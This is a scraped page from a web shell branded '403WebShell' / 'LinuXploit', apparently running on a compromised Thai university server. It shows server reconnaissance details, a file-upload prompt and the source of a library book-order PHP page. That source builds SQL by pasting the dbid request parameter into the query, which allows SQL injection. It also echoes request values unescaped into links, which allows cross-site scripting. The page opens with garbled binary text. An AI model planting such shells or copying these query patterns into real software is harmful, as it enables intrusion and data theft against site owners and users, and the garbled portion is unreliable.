403WebShell

h( )($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms��Sb�,;R''6c2I�!\��kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K��x)1�6@r*2�89ma��&��'ti��{~#��t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1��w�r��l&-t*3�<<�u��#��j&.u��J68\8?"#$%&'()*+,-./0 !
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell403Webshell

Server IP : 10.254.12.21 / Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON | cURL : ON | WGET : OFF | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON
Directory : /var/www/html/lib/selectbook2021/pages/

Upload File :

[ Back ]

Current File : /var/www/html/lib/selectbook2021/pages/list_table.php

<?php include 'dbconnect.php';?>
<?php include 'header.php';?>

<?php
	if(isset($_GET["dbid"]))
	{
		$dbid = $_GET["dbid"];
	}
	else 
	{
		$dbid = "";
	}
	
	$sql = "SELECT book_detail.database_id, order_item.order_item_id, order_detail.order_date, book_detail.title, book_detail.author, book_detail.pub_year, book_detail.isbn, book_detail.link, book_detail.price, database_detail.database_name, order_detail.first_name, order_detail.last_name, order_status.order_status_name, order_status.status_color
FROM (((order_detail INNER JOIN order_item ON order_detail.order_id = order_item.order_id) INNER JOIN book_detail ON order_item.book_id = book_detail.book_id) INNER JOIN database_detail ON book_detail.database_id = database_detail.database_id) INNER JOIN order_status ON order_item.order_status_id = order_status.order_status_id";
	if($dbid<>"")
	{
		$sql .= " WHERE book_detail.database_id='" . $dbid . "'";
	}
	$sql .= " ORDER BY order_item.order_item_id DESC" ;

	$query = mysqli_query($conn,$sql);
	
	$num_rows = mysqli_num_rows($query);

	$per_page = 30;   // Per Page
	$page  = 1;
	
	if(isset($_GET["Page"]))
	{
		$page = $_GET["Page"];
	}
	
	$prev_page = $page-1;
	$next_page = $page+1;

	$row_start = (($per_page*$page)-$per_page);
	if($num_rows<=$per_page)
	{
		$num_pages =1;
	}
	else if(($num_rows % $per_page)==0)
	{
		$num_pages =($num_rows/$per_page) ;
	}
	else
	{
		$num_pages =($num_rows/$per_page)+1;
		$num_pages = (int)$num_pages;
	}

	$row_end = $per_page;

	$sql .= " LIMIT $row_start ,$row_end";
	$query = mysqli_query($conn,$sql);
?>

<h4 class="page-header">ติดตามสถานะหนังสือที่แนะนำให้ห้องสมุดจัดซื้อ</h4>
                                <table class="table table-striped table-bordered table-hover">
                                    <thead>
                                        <tr>
										<th><div align="center">ลำดับที่</div></th>
										<th><div align="center">วันที่สั่ง</div></th>
                                        <th><div align="center">ชื่อเรื่อง</div></th>
										<th><div align="center">ชื่อผู้แต่ง</div></th>
                                        <th><div align="center">ปีที่พิมพ์</div></th>
										<th><div align="center">ISBN</div></th>
										<th><div align="center">URL ตัวอย่างหนังสือ</div></th>
										<th><div align="center">ราคา</div></th>
										<th><div align="center">ผู้สั่ง</div></th>
										<th><div align="center">สถานะ</div></th>
                                        </tr>
                                    </thead>
                                <tbody>
<?php								
	while ($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) 
	{
?>

                                    <tr>
										<td><?php echo $result["order_item_id"];?></td>	
										<td><?php echo $result["order_date"];?></td>	
										<td><?php echo $result["title"];?></td>	
										<td><?php echo $result["author"];?></td>	
										<td><?php echo $result["pub_year"];?></td>
										<td><?php echo $result["isbn"];?></td>
										<td><?php echo $result["link"];?></td>
										<td><?php echo $result["price"];?></td>										
										<td><?php echo $result["first_name"] . " " . $result["last_name"];?></td>
										<td bgcolor=<?php echo $result["status_color"];?>><?php echo $result["order_status_name"];?></td>
									</tr>
<?php	
	} //while ($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) 
?>
                                </tbody>
                            </table>
                            <!-- /.table-responsive -->

<br>
Total <?php echo $num_rows;?> Orders : <?php echo $num_pages;?> Page :
<?php
if($prev_page)
{
	$prev_url = "<a href='$_SERVER[SCRIPT_NAME]?Page=$prev_page&txtKeyword=$strKeyword";
	if ($dbid<>"") {
		$prev_url .= "&dbid=" . $dbid;
	}
	$prev_url .= "'><< Back</a> ";
	//echo " <a href='$_SERVER[SCRIPT_NAME]?Page=$prev_page&txtKeyword=$strKeyword'><< Back</a> ";
	echo $prev_url;
}

for($i=1; $i<=$num_pages; $i++){
	if($i != $page)
	{
		//echo "[ <a href='$_SERVER[SCRIPT_NAME]?Page=$i&txtKeyword=$strKeyword'>$i</a> ]";
		$cur_url = "[ <a href='$_SERVER[SCRIPT_NAME]?Page=$i&txtKeyword=$strKeyword";
		if ($dbid<>"") {
			$cur_url .= "&dbid=" . $dbid;
		}
		$cur_url .= "'>$i</a> ]";		
		echo $cur_url;
	}
	else
	{
		echo "<b> $i </b>";
	}
}
if($page!=$num_pages)
{
	//echo " <a href ='$_SERVER[SCRIPT_NAME]?Page=$next_page&txtKeyword=$strKeyword'>Next>></a> ";
	$next_url = " <a href ='$_SERVER[SCRIPT_NAME]?Page=$next_page&txtKeyword=$strKeyword";
	if ($dbid<>"") {
		$next_url .= "&dbid=" . $dbid;
	}
	$next_url .= "'>Next>></a> ";
	echo $next_url;
}							
?>
<BR><BR><BR>

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit